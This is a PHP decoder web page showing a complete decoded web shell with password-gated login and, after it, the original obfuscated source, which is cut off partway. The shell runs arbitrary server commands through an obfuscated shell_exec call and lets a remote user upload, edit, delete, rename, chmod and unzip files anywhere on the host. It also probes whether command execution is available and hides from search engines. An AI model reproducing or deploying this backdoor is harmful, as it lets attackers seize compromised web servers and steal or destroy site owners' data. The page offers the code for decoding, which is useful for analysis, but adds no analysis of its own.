Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto NO0D9; bCNjm: if (!isset($_SESSION["\x61\144\155\151\x6e"])) { if ($_SESSION[..

Decoded Output download

<?php 
 goto NO0D9; bCNjm: if (!isset($_SESSION["admin"])) { if ($_SESSION["admin"] !== "80b962d988e9b5d671d1997237b880aa") { echo "<p id="file">File Not Found.</p>"; die; } die; } else { ?> 
<!doctypehtml><html><head><title>ERR</title><meta content="noindex"name="robots"><link href="https://git-scm.com/images/logos/downloads/Git-Icon-1788C.png"rel="icon"type="image/icon type"><script crossorigin="anonymous"src="https://kit.fontawesome.com/9af3d25b53.js"></script><style type="text/css">html{width:100%;background-color:#111;margin:0;padding:0;color:#fff;font-family:arial,Verdana}body{width:100%;margin:0;padding:0}a{display:inline-block;text-decoration:none;color:#0f0;font-size:15px;font-weight:700;border:none}input{display:inline}input[type=text]{background:0 0;color:#fff;border:none;border-bottom:2px solid green;padding:7px;outline:0;margin:0}#cmd{background:0 0;color:#eee;font-weight:700;border:1px solid #0f0;padding:5px 10px;outline:0;margin:0}::placeholder{color:#eee;opacity:1}input[type=submit]{display:inline;background:green;color:#fff;border:none;padding:7px;margin:0;border-radius:8%;cursor:pointer}button{display:inline;cursor:pointer;background:green;color:#fff}table{border:3px solid #121212;border-radius:0;display:block;width:1200px;height:100%;color:#fff;background:#161616;margin:0;margin-top:0;padding:8px;font-weight:700}a:hover{text-decoration:underline;color:#fff}td{font-size:15px;background:0 0;color:#f8f8f8;margin:0;padding:0;padding-bottom:5px;border:0}tr{border:0;width:100%;margin:0;padding:10px;height:20px}th{border-bottom:2px solid #444;text-align:left;padding:15px}#menu{background:#222;color:#eee;padding:12px;border:none;border-radius:5px;font-size:10px;font-weight:700}#menu:hover{background:#f88000;border-radius:5px}#newinput{width:150px;border-bottom:1px solid #eee;padding:8px}#newinput:focus{border-bottom:1px solid #ff4500}#crud{background:0 0;padding:8px;font-size:15px;color:#0f0;font-weight:700;border-radius:0;border-bottom:0 solid #0f0}#crud:hover{text-shadow:red 5px 0 10px;color:red;text-decoration:none;border-bottom:2px solid #f8f8ff}#delete{background:0 0;padding:8px;font-size:15px;color:#ff69b4;font-weight:blod;border:2.5px solid transparent}#delete:hover{background:0 0;color:#fff;border-bottom:1px solid #fff;text-shadow:#fc0 1px 0 10px}#filename{font-size:15px;color:#f5f5f5}#filename:hover{text-shadow:red 1px 0 10px;color:#adff2f;text-decoration:underline}.container{border-radius:0;display:block;width:100%}form{display:inline}textarea{background:#151515;border:1px solid $444;color:#eee;font-size:15px;font-weight:700;outline:0;border:0;border-radius:10px;padding:5px 10px;border-top-left-radius:0;border-top-right-radius:0;border-bottom-left-radius:0}.custom-file-input::-webkit-file-upload-button{visibility:hidden}.custom-file-input::before{content:'upload';display:inline-block;background:linear-gradient(top,#f9f9f9,#e3e3e3);border:1px solid #999;border-radius:3px;padding:5px 8px;outline:0;white-space:nowrap;-webkit-user-select:none;cursor:pointer;font-weight:700;font-size:10pt}.custom-file-input:hover::before{border-color:#000}.custom-file-input:active::before{background:-webkit-linear-gradient(top,#e3e3e3,#f9f9f9)}</style></head><body><?php  if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { $server = "WIN"; } if (isset($_POST["create_file"])) { if (!isset($_GET["path"])) { $new_filehandler = fopen(dirname(__FILE__) . "/" . $_POST["new_file"], "w"); } else { $new_filehandler = fopen(hex2bin($_GET["path"]) . "/" . $_POST["new_file"], "w"); } fwrite($new_filehandler, ''); fclose($new_filehandler); } if (isset($_POST["mkdir_folder"])) { if (!isset($_GET["path"])) { mkdir(dirname(__FILE__) . "/" . $_POST["new_folder"], 511, true); } else { mkdir(hex2bin($_GET["path"]) . "/" . $_POST["new_folder"], 511, true); } } if (isset($_POST["upload_file"])) { if (isset($_GET["path"])) { $target_dir = hex2bin($_GET["path"]) . "/"; } else { $target_dir = dirname(__FILE__) . "/"; } $target_file = $target_dir . basename($_FILES["upload_filename"]["name"]); if (move_uploaded_file($_FILES["upload_filename"]["tmp_name"], $target_file)) { $_GET["path"]; } if (filesize($target_file)) { echo "<center><table style="background: lime;"><tr><td style="color:#000;">Successfully Uploaded!</td></tr></table></center>"; } } if (isset($_POST["nagamine"])) { $tmp_name = dirname(__FILE__) . "/.k.txt"; chmod($tmp_name, 420); $tmp_handler = fopen($tmp_name, "w"); fwrite($tmp_handler, "demo"); fclose($tmp_handler); echo dirname(__FILE__); if (function_exists("shell_exec")) { echo "shell_ exec"; } else { echo "0"; } } ?> 
<body><center><br><br><table style="border:0;margin-bottom:0;padding-bottom:0"><tr><th style="border:0"colspan="3"><a href="?"id="filename"style="text-decoration:none"><i class="fa-solid fa-ghost"></i> HOME SHELL</a></th></tr><tr><th style="border:none;color:#f88000"><i>CAR<font color="#DC0000">ERR</font>A</i> <font color="#eee"size="1">CX-499</font></th><th style="border:none"><button id="menu"name="mkdir_folder"onclick="new_folder()"><i class="fa-solid fa-sharp fa-virus"></i> NEW FOLDER</button><div id="new_folder"style="display:none"><form method="POST"><input name="new_folder"placeholder="[folder_name]"id="newinput"> <button id="menu"name="mkdir_folder">OK >></button></form></div></th><th style="border:none"><button id="menu"name="create_file"onclick="new_file()"><i class="fa-solid fa-sharp fa-virus"></i> NEW FILE</button><div id="new_file"style="display:none"><form method="POST"><input name="new_file"placeholder="[file_name]"id="newinput"> <button id="menu"name="create_file">OK >></button></form></div></th><script>function new_folder(){var e=document.getElementById("new_folder"),n=document.getElementById("new_file");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):e.style.display="none"}function new_file(){var e=document.getElementById("new_file"),n=document.getElementById("new_folder");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):e.style.display="none"}</script><th style="border:none"><button id="menu"name="create_file"><i class="fa-solid fa-sharp fa-virus"></i> EW-ABLE/NAH</button></th><th style="border:none"><button id="menu"name="create_file"><i class="fa-solid fa-sharp fa-virus"></i> N-TOD</button></th><th style="border:none"><?php  if (isset($_POST["logout"])) { session_destroy(); echo "<script>window.location="?xx";</script>"; } ?> 
<form method="POST"action=""><button id="menu"name="logout"><i class="fa-solid fa-sharp fa-virus"></i> LOGOUT</button></form></th></tr></table><table style="border:none;margin-top:0;padding-bottom:0"><tr><th style="border-bottom:none;font-size:12px;margin-left:0"><button style="background:#f88000;color:#111;font-weight:700;border:2px solid #f88000;padding:11px;border-radius:6%"onclick="toolsDiv()"></button> :<div id="toolsDIV"style="display:none"><form method="POST"action=""><input name="nagamine"type="hidden"> <button style="background:#eee;color:#111;font-weight:700;border:2px solid #eee;padding:11px;border-radius:6%"></button></form>: <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F2</button> : <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F3</button> : <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F4</button> : <button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%"> </button> :</div><div id="yuzu"style="display:inline"><button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%"onclick="yuzuDiv()">Yu-Zu</button> :<div id="yuzuDiv"style="display:none"><form method="POST"action=""enctype="multipart/form-data"><input name="upload_file"type="submit"id="submit"style="display:none"> <input name="upload_filename"type="file"class="custom-file-input"onchange='document.getElementById("submit").click()'></form>:</div><form method="POST"action=""><input name="wp-install-plugin"type="hidden"> <button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%">KI-K</button></form>:</div><form method="POST"action=""><input name="c-engine"type="hidden"> <button style="background:#0f0;color:#111;font-weight:700;border:2px solid #0f0;padding:11px;border-radius:6%">-<?php  if ($_SESSION["engine"] == "admin") { echo "<font color='#eee'>[Tmpv] actived</font>"; } else { echo "<font color='#111'>[Tmpv]</font>"; } ?> 
</button></form></th></tr><?php  if (isset($_POST["c-engine"])) { if ($_SESSION["engine"] == "admin") { unset($_SESSION["engine"]); } else { unset($_SESSION["engine"]); echo "<tr><td><form method='POST' action='#success'><input type='text' placeholder=' >> C-ENGINE PW' name='pwcmd'><input type='submit'></form></td></tr><br>"; } } if (isset($_POST["pwcmd"])) { if ($_POST["pwcmd"] == "0xc4") { $_SESSION["engine"] = "admin"; } } if ($_SESSION["engine"] == "admin") { echo "<tr><td>::: <form method='POST'><input id='cmd' type='text' placeholder=' >> C-ENGINE' name='cengine'> | <button id='cmd'>>></button></form></td></tr><br>"; } ?> 
</table><?php  if (isset($_POST["cengine"])) { $cmdx = "736865"; $cmdy = "786563"; $xxx = hex2bin($cmdx) . "ll_e" . hex2bin($cmdy); $xv = $xxx($_POST["cengine"]); ?> 
<textarea style="width:60%;height:400px"><?php  echo $xv; ?> 
</textarea><?php  } ?> 
</center><script>function toolsDiv(){var e=document.getElementById("toolsDIV"),n=document.getElementById("yuzu"),l=document.getElementById("yuzuDiv");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):(e.style.display="none",n.style.display="inline"),l.style.display="none"}function yuzuDiv(){var e=document.getElementById("toolsDIV"),n=document.getElementById("yuzuDiv");"none"===n.style.display?n.style.display="inline":n.style.display="none",e.style.display="none"}</script><?php  if (!isset($_GET["path"])) { $dir = getcwd(); $path = bin2hex($dir); $_GET["path"]; $current_file = hex2bin($_GET["path"]); echo "<center><table style="border: 0;"><tr><td>"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold"> | </font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = bin2hex($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; } else { $path = $_GET["path"]; $dir = hex2bin($_GET["path"]); $current_file = hex2bin($_GET["path"]); echo "<center><table style="border: 0;"><tr><td>"; if ($server !== "WIN") { echo "<a href="?path=2f">/</a></td><td>"; } $dirs = str_replace("\", "/", $dir); $xdir = explode("/", $dirs); foreach ($xdir as $key => $value) { if ($value != '') { echo "<font style="color:#555; font-weight: bold"> | </font>"; } if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { echo "<a href="?path="; } else { echo "<a href="?path=2f"; } for ($i = 0; $i <= intval($key); $i++) { $folder_path = bin2hex($xdir[$i] . "/"); $filepath = $xdir[$i] . "/"; $fld = str_replace(" ", '', $filepath); $fld = str_replace("/", '', $filepath); if ($folder_path != "2f") { echo $folder_path; } } echo "">" . $fld . "</a>"; } echo "</tr></td></table></center>"; if (is_file($current_file)) { $dirname = bin2hex(dirname($current_file)); $my = $current_file; $myrx = str_replace($_SERVER["DOCUMENT_ROOT"], "/", $my); ?> 
<br><center><table style="width:1200px;border-bottom-left-radius:0;border-bottom-right-radius:0"><tr><td>Filename: <a href="<?php  echo "//" . $_SERVER["HTTP_HOST"] . "/" . $myrx; ?> 
"target="_blank"><?php  echo $current_file; ?> 
</a></td></tr></table><?php  $f = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f($current_file); ?> 
<textarea style="width:1180px;height:660px"readonly><?php  echo htmlentities($text); ?> 
		</textarea><br><br><br><?php  die; } } if (isset($_POST["rename_folder_proccess"])) { rename($_POST["oldfoldername"], $_POST["dirfoldername"] . "/" . $_POST["newfoldername"]); } if (isset($_POST["rename_folder"])) { ?> 
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> RENAME FOLDER</th><th>dirname:</th><th><?php  echo dirname(hex2bin($_POST["folderpath"])) . "/"; ?> 
</th><th width="600px"><form method="POST"><input name="dirfoldername"type="hidden"value="<?php  echo dirname(hex2bin($_POST["folderpath"])) . "/"; ?> 
"> <input name="oldfoldername"type="hidden"value="<?php  echo hex2bin($_POST["folderpath"]); ?> 
"> <input name="newfoldername"value="<?php  echo $_POST["foldername"]; ?> 
"style="font-size:18px;width:100%"></th><th><input name="rename_folder_proccess"type="submit"value="REN"id="crud"></th></tr></table></center><?php  die; } if (isset($_POST["deletefolder"])) { chmod(hex2bin($_POST["folderpath"], 511)); rmdir(hex2bin($_POST["folderpath"])); } if (isset($_POST["rename_file_proccess"])) { rename($_POST["oldfilename"], $_POST["dirfilename"] . "/" . $_POST["newfilename"]); } if (isset($_POST["rename_file"])) { ?> 
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> RENAME FILE</th><th>dirname:</th><th><?php  echo dirname(hex2bin($_POST["filepath"])) . "/"; ?> 
</th><th width="600px"><form method="POST"><input name="dirfilename"type="hidden"value="<?php  echo dirname(hex2bin($_POST["filepath"])) . "/"; ?> 
"> <input name="oldfilename"type="hidden"value="<?php  echo hex2bin($_POST["filepath"]); ?> 
"> <input name="newfilename"value="<?php  echo $_POST["filename"]; ?> 
"style="font-size:18px;width:100%"></th><th><input name="rename_file_proccess"type="submit"value="REN"id="crud"></th></tr></table></center><?php  die; } if (isset($_POST["unzip_file"])) { $zip = new ZipArchive(); $res = $zip->open(hex2bin($_POST["filepath"])); if ($res === TRUE) { $zip->extractTo(dirname(hex2bin($_POST["filepath"]))); $zip->close(); echo "<center><table style="background: #00C400;"><tr><td>Successfully Unzip File!</td></tr></table></center>"; } else { echo "<center><table style="background: #DC0000;"><tr><td>Failed to Unzip File!</td></tr></table></center>"; } } if (isset($_POST["deletefile"])) { chmod(hex2bin($_POST["filepath"]), 438); unlink(hex2bin($_POST["filepath"])); } if (isset($_POST["savefile"])) { $file_handler = fopen($_POST["filepath"], "w"); fwrite($file_handler, $_POST["file_content"]); fclose($file_handler); } if (isset($_POST["edit_file"])) { echo "<br><br><br>"; $f = "f" . "i" . "l" . "e" . "_" . "g" . "e" . "t" . "_" . "c" . "o" . "n" . "t" . "e" . "n" . "t" . "s"; $text = $f(hex2bin($_POST["filepath"])); ?> 
<center><table style="background:#f88000;width:1200px;border-bottom-left-radius:0;border-bottom-right-radius:0"><tr><td>EDITING FILE:<?php  echo $_POST["filename"]; ?> 
</td></tr></table><form method="POST"><textarea style="background:#222;width:1180px;height:500px;color:#00c400"name="file_content"><?php  echo htmlentities($text); ?> 
</textarea><br><br><input name="filepath"type="hidden"value="<?php  echo hex2bin($_POST["filepath"]); ?> 
"> <input name="savefile"type="submit"value="save"style="font-size:18px"></form><br><br></center><?php  die; } if (isset($_POST["chmod_file_proccess"])) { $file = trim($_POST["file_to_chmod"]); $chmod = "0" . $_POST["chmod_file_value"]; if (chmod(strval($file), intval($chmod))) { echo $file; echo $chmod; chmod(strval($file), intval($chmod)); } else { echo "cannot chmod this file"; } } if (isset($_POST["chmod_file"])) { ?> 
<br><br><center><table><tr><th><i class="fa-solid fa-sharp fa-hippo"></i> CHMOD FILE</th><th>filename:</th><th><?php  echo hex2bin($_POST["filepath"]); ?> 
</th><th width="600px"><form method="POST"action=""><input name="file_to_chmod"type="hidden"value="<?php  echo hex2bin($_POST["filepath"]); ?> 
"> <input name="chmod_file_value"value="<?php  echo $_POST["chmod_file"]; ?> 
"style="font-size:18px;width:100%"></th><th><input name="chmod_file_proccess"type="submit"value="CHMOD"id="crud"></th></tr></table></center><?php  die; } echo "<br>"; if (is_dir($dir)) { $isi_dir = scandir($dir); } else { $isi_dir = $current_file; } ?> 
<center><table style="width:1200px"><tr><th style="width:450px"><i class="fa-solid fa-sharp fa-virus"></i> NAME</th><th style="width:170px"colspan="4">ACTION</th><th style="text-align:right;width:330px">SIZE</th><th style="width:50px"></th></tr><?php  foreach ($isi_dir as $x => $foldername) { if (is_dir($dir . "/" . $foldername)) { if ($foldername !== "." & $foldername !== "..") { $folderpath = bin2hex($dir . "/" . $foldername); ?> 
<tr><td><p><i class="fa-solid fa-folder-open"style="color:#ff0;padding:5px;text-shadow:#000 1px 0 10px"></i> <a href="?path=<?php  echo $folderpath; ?> 
"id="filename"><?php  echo $foldername; ?> 
</a></p></td><td></td><td><form method="POST"><input name="folderpath"type="hidden"value="<?php  echo $folderpath; ?> 
"> <input name="foldername"type="hidden"value="<?php  echo $foldername; ?> 
"> <input name="rename_folder"type="submit"value="REN"id="crud"></form></td><td></td><td><form method="POST"><input name="folderpath"type="hidden"value="<?php  echo $folderpath; ?> 
"> <input name="foldername"type="hidden"value="<?php  echo $foldername; ?> 
"> <input name="deletefolder"type="submit"value="DEL"id="crud"style="color:#dc0000"></form></td><td align="right">DIR |</td><td><?php  $folder_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", hex2bin($folderpath)); ?> 
<a href="<?php  echo "http://" . $_SERVER["HTTP_HOST"] . "/" . $folder_x; ?> 
"target="_blank"><i class="fa-solid fa-sharp fa-arrow-up-right-from-square"></i></a></td></tr><?php  } } } echo ''; foreach ($isi_dir as $x => $filename) { if (is_file($dir . "/" . $filename)) { if ($filename !== "." & $filename !== "..") { $filepath = bin2hex($dir . "/" . $filename); ?> 
<tr><td><p><i class="fa-solid fa-file-lines"style="color:#ff4500;padding:5px;text-shadow:#000 1px 0 10px"></i> <a href="?path=<?php  echo $filepath; ?> 
"id="filename"><?php  echo $filename; ?> 
</a></p></td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?> 
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?> 
"> <input name="edit_file"type="submit"value="EDIT"id="crud"></form></td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?> 
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?> 
"> <input name="rename_file"type="submit"value="REN"id="crud"></form></td><td><?php  $ext = pathinfo($filename, PATHINFO_EXTENSION); if ($ext == "zip") { ?> 
<form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?> 
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?> 
"> <input name="unzip_file"type="submit"value="UNZ"id="crud"style="color:#f88000"></form><?php  } ?> 
</td><td><form method="POST"><input name="filepath"type="hidden"value="<?php  echo $filepath; ?> 
"> <input name="filename"type="hidden"value="<?php  echo $filename; ?> 
"> <input name="deletefile"type="submit"value="DEL"id="crud"style="color:#dc0000"></form></td><td align="right"><?php  echo filesize($dir . "/" . $filename); ?> 
KB |</td><td><?php  $file_x = str_replace($_SERVER["DOCUMENT_ROOT"], "/", hex2bin($filepath)); ?> 
<a href="<?php  echo "http://" . $_SERVER["HTTP_HOST"] . "/" . $file_x; ?> 
"target="_blank"><i class="fa-solid fa-sharp fa-arrow-up-right-from-square"></i></a></td></tr><?php  } } } echo "</table><table><tr><td style="color: #444;"><i>Pure Coded by PENGABDI STEPMOM</i></tr></td></table></center><br><br /></body>"; } goto XDJlj; DlMqe: session_start(); goto MvAKD; NO0D9: error_reporting(0); goto DlMqe; I6Ird: if (isset($_GET["xx"])) { ?> 
<form method="POST"><input name="admin"><input name="login"type="submit"></form><?php  } goto bCNjm; MvAKD: if (isset($_POST["login"])) { $password = $_POST["admin"]; $password = md5($password); $pass = "80b962d988e9b5d671d1997237b880aa"; if ($password == $pass) { $_SESSION["admin"] = "80b962d988e9b5d671d1997237b880aa"; } } goto I6Ird; XDJlj: ?> 

Did this file decode correctly?

Original Code

<?php
 goto NO0D9; bCNjm: if (!isset($_SESSION["\x61\144\155\151\x6e"])) { if ($_SESSION["\x61\x64\155\x69\x6e"] !== "\70\x30\x62\71\66\x32\x64\x39\x38\x38\145\x39\x62\65\144\66\x37\x31\144\61\x39\71\x37\62\63\x37\142\70\70\x30\x61\141") { echo "\74\x70\40\151\144\x3d\42\x66\x69\x6c\145\42\x3e\x46\x69\x6c\x65\x20\x4e\x6f\164\x20\x46\x6f\165\x6e\144\56\74\57\x70\x3e"; die; } die; } else { ?>
<!doctypehtml><html><head><title>ERR</title><meta content="noindex"name="robots"><link href="https://git-scm.com/images/logos/downloads/Git-Icon-1788C.png"rel="icon"type="image/icon type"><script crossorigin="anonymous"src="https://kit.fontawesome.com/9af3d25b53.js"></script><style type="text/css">html{width:100%;background-color:#111;margin:0;padding:0;color:#fff;font-family:arial,Verdana}body{width:100%;margin:0;padding:0}a{display:inline-block;text-decoration:none;color:#0f0;font-size:15px;font-weight:700;border:none}input{display:inline}input[type=text]{background:0 0;color:#fff;border:none;border-bottom:2px solid green;padding:7px;outline:0;margin:0}#cmd{background:0 0;color:#eee;font-weight:700;border:1px solid #0f0;padding:5px 10px;outline:0;margin:0}::placeholder{color:#eee;opacity:1}input[type=submit]{display:inline;background:green;color:#fff;border:none;padding:7px;margin:0;border-radius:8%;cursor:pointer}button{display:inline;cursor:pointer;background:green;color:#fff}table{border:3px solid #121212;border-radius:0;display:block;width:1200px;height:100%;color:#fff;background:#161616;margin:0;margin-top:0;padding:8px;font-weight:700}a:hover{text-decoration:underline;color:#fff}td{font-size:15px;background:0 0;color:#f8f8f8;margin:0;padding:0;padding-bottom:5px;border:0}tr{border:0;width:100%;margin:0;padding:10px;height:20px}th{border-bottom:2px solid #444;text-align:left;padding:15px}#menu{background:#222;color:#eee;padding:12px;border:none;border-radius:5px;font-size:10px;font-weight:700}#menu:hover{background:#f88000;border-radius:5px}#newinput{width:150px;border-bottom:1px solid #eee;padding:8px}#newinput:focus{border-bottom:1px solid #ff4500}#crud{background:0 0;padding:8px;font-size:15px;color:#0f0;font-weight:700;border-radius:0;border-bottom:0 solid #0f0}#crud:hover{text-shadow:red 5px 0 10px;color:red;text-decoration:none;border-bottom:2px solid #f8f8ff}#delete{background:0 0;padding:8px;font-size:15px;color:#ff69b4;font-weight:blod;border:2.5px solid transparent}#delete:hover{background:0 0;color:#fff;border-bottom:1px solid #fff;text-shadow:#fc0 1px 0 10px}#filename{font-size:15px;color:#f5f5f5}#filename:hover{text-shadow:red 1px 0 10px;color:#adff2f;text-decoration:underline}.container{border-radius:0;display:block;width:100%}form{display:inline}textarea{background:#151515;border:1px solid $444;color:#eee;font-size:15px;font-weight:700;outline:0;border:0;border-radius:10px;padding:5px 10px;border-top-left-radius:0;border-top-right-radius:0;border-bottom-left-radius:0}.custom-file-input::-webkit-file-upload-button{visibility:hidden}.custom-file-input::before{content:'upload';display:inline-block;background:linear-gradient(top,#f9f9f9,#e3e3e3);border:1px solid #999;border-radius:3px;padding:5px 8px;outline:0;white-space:nowrap;-webkit-user-select:none;cursor:pointer;font-weight:700;font-size:10pt}.custom-file-input:hover::before{border-color:#000}.custom-file-input:active::before{background:-webkit-linear-gradient(top,#e3e3e3,#f9f9f9)}</style></head><body><?php  if (strtoupper(substr(PHP_OS, 0, 3)) === "\127\x49\x4e") { $server = "\127\x49\x4e"; } if (isset($_POST["\x63\x72\145\x61\164\x65\137\x66\x69\x6c\145"])) { if (!isset($_GET["\x70\x61\x74\150"])) { $new_filehandler = fopen(dirname(__FILE__) . "\57" . $_POST["\156\145\x77\137\x66\x69\154\145"], "\167"); } else { $new_filehandler = fopen(hex2bin($_GET["\x70\141\x74\150"]) . "\x2f" . $_POST["\x6e\145\167\137\146\151\154\x65"], "\167"); } fwrite($new_filehandler, ''); fclose($new_filehandler); } if (isset($_POST["\155\153\x64\x69\x72\137\x66\x6f\x6c\x64\145\162"])) { if (!isset($_GET["\x70\141\164\x68"])) { mkdir(dirname(__FILE__) . "\x2f" . $_POST["\156\x65\167\137\146\x6f\x6c\144\x65\x72"], 511, true); } else { mkdir(hex2bin($_GET["\160\x61\x74\x68"]) . "\57" . $_POST["\156\x65\x77\137\x66\x6f\154\x64\x65\162"], 511, true); } } if (isset($_POST["\165\x70\154\157\x61\144\x5f\x66\151\x6c\145"])) { if (isset($_GET["\160\141\x74\x68"])) { $target_dir = hex2bin($_GET["\160\x61\164\x68"]) . "\x2f"; } else { $target_dir = dirname(__FILE__) . "\x2f"; } $target_file = $target_dir . basename($_FILES["\165\160\x6c\157\141\144\x5f\x66\x69\x6c\x65\156\141\155\145"]["\x6e\141\155\145"]); if (move_uploaded_file($_FILES["\165\x70\154\x6f\141\144\x5f\x66\x69\154\x65\156\141\155\x65"]["\164\155\160\137\x6e\141\155\x65"], $target_file)) { $_GET["\160\x61\x74\x68"]; } if (filesize($target_file)) { echo "\x3c\x63\145\x6e\164\x65\162\76\x3c\x74\x61\142\x6c\145\x20\x73\x74\171\154\145\x3d\42\142\141\x63\x6b\x67\x72\x6f\x75\x6e\144\72\x20\x6c\x69\x6d\x65\x3b\42\76\74\x74\162\x3e\x3c\x74\x64\40\x73\x74\171\154\x65\75\x22\143\x6f\154\157\x72\72\x23\x30\60\x30\x3b\x22\x3e\123\165\x63\143\145\x73\x73\x66\x75\x6c\x6c\x79\x20\125\160\x6c\157\141\144\145\144\41\x3c\57\x74\144\x3e\x3c\x2f\164\x72\76\74\57\164\x61\x62\154\x65\x3e\x3c\57\143\145\156\x74\145\162\x3e"; } } if (isset($_POST["\156\141\x67\x61\x6d\151\156\145"])) { $tmp_name = dirname(__FILE__) . "\57\56\153\56\x74\x78\x74"; chmod($tmp_name, 420); $tmp_handler = fopen($tmp_name, "\167"); fwrite($tmp_handler, "\144\145\x6d\x6f"); fclose($tmp_handler); echo dirname(__FILE__); if (function_exists("\163\150\x65\154\x6c\137\145\x78\145\x63")) { echo "\163\150\x65\x6c\154\x5f\x20\x65\x78\145\143"; } else { echo "\x30"; } } ?>
<body><center><br><br><table style="border:0;margin-bottom:0;padding-bottom:0"><tr><th style="border:0"colspan="3"><a href="?"id="filename"style="text-decoration:none"><i class="fa-solid fa-ghost"></i> HOME SHELL</a></th></tr><tr><th style="border:none;color:#f88000"><i>CAR<font color="#DC0000">ERR</font>A</i> <font color="#eee"size="1">CX-499</font></th><th style="border:none"><button id="menu"name="mkdir_folder"onclick="new_folder()"><i class="fa-solid fa-sharp fa-virus"></i> NEW FOLDER</button><div id="new_folder"style="display:none"><form method="POST"><input name="new_folder"placeholder="[folder_name]"id="newinput"> <button id="menu"name="mkdir_folder">OK >></button></form></div></th><th style="border:none"><button id="menu"name="create_file"onclick="new_file()"><i class="fa-solid fa-sharp fa-virus"></i> NEW FILE</button><div id="new_file"style="display:none"><form method="POST"><input name="new_file"placeholder="[file_name]"id="newinput"> <button id="menu"name="create_file">OK >></button></form></div></th><script>function new_folder(){var e=document.getElementById("new_folder"),n=document.getElementById("new_file");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):e.style.display="none"}function new_file(){var e=document.getElementById("new_file"),n=document.getElementById("new_folder");"none"===e.style.display?(e.style.display="inline",n.style.display="none"):e.style.display="none"}</script><th style="border:none"><button id="menu"name="create_file"><i class="fa-solid fa-sharp fa-virus"></i> EW-ABLE/NAH</button></th><th style="border:none"><button id="menu"name="create_file"><i class="fa-solid fa-sharp fa-virus"></i> N-TOD</button></th><th style="border:none"><?php  if (isset($_POST["\x6c\157\147\x6f\165\164"])) { session_destroy(); echo "\74\163\143\162\151\x70\164\x3e\x77\151\x6e\x64\x6f\x77\56\x6c\x6f\143\141\x74\151\x6f\156\75\42\77\x78\x78\x22\x3b\74\57\x73\143\162\151\x70\164\x3e"; } ?>
<form method="POST"action=""><button id="menu"name="logout"><i class="fa-solid fa-sharp fa-virus"></i> LOGOUT</button></form></th></tr></table><table style="border:none;margin-top:0;padding-bottom:0"><tr><th style="border-bottom:none;font-size:12px;margin-left:0"><button style="background:#f88000;color:#111;font-weight:700;border:2px solid #f88000;padding:11px;border-radius:6%"onclick="toolsDiv()"></button> :<div id="toolsDIV"style="display:none"><form method="POST"action=""><input name="nagamine"type="hidden"> <button style="background:#eee;color:#111;font-weight:700;border:2px solid #eee;padding:11px;border-radius:6%"></button></form>: <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F2</button> : <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F3</button> : <button style="background:0 0;border:2px solid #eee;padding:11px;border-radius:2px">F4</button> : <button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%"> </button> :</div><div id="yuzu"style="display:inline"><button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%"onclick="yuzuDiv()">Yu-Zu</button> :<div id="yuzuDiv"style="display:none"><form method="POST"action=""enctype="multipart/form-data"><input name="upload_file"type="submit"id="submit"style="display:none"> <input name="upload_filename"type="file"class="custom-file-input"onchange='document.getElementById("submit").click()'></form>:</div><form method="POST"action=""><input name="wp-install-plugin"type="hidden"> <button style="background:#dc0000;color:#eee;font-weight:700;border:2px solid #dc0000;padding:11px;border-radius:6%">KI-K</button></form>:</div><form method="POST"action=""><input name="c-engine"type="hidden"> <button style="background:#0f0;color:#111;font-weight:700;border:2px solid #0f0;padding:11px;border-radius:6%">-<?php  if ($_SESSION["\145\156\x67\151\156\x65"] == "\x61\144\x6d\151\x6e") { echo "\74\146\x6f\156\x74\40\x63\157\x6c\157\162\75\47\43\145\x65\145\47\76\x5b\124\xcc\xb7\x6d\314\267\x70\314\267\166\314\xb7\x5d\x20\141\143\x74\x69\x76\145\x64\x3c\57\146\x6f\156\164\76"; } else { echo "\74\146\157\x6e\x74\40\143\157\154\157\162\x3d\x27\x23\61\x31\61\47\76\x5b\x54\314\267\155\xcc\267\x70\xcc\xb7\166\314\267\x5d\74\57\x66\x6f\x6e\164\76"; } ?>
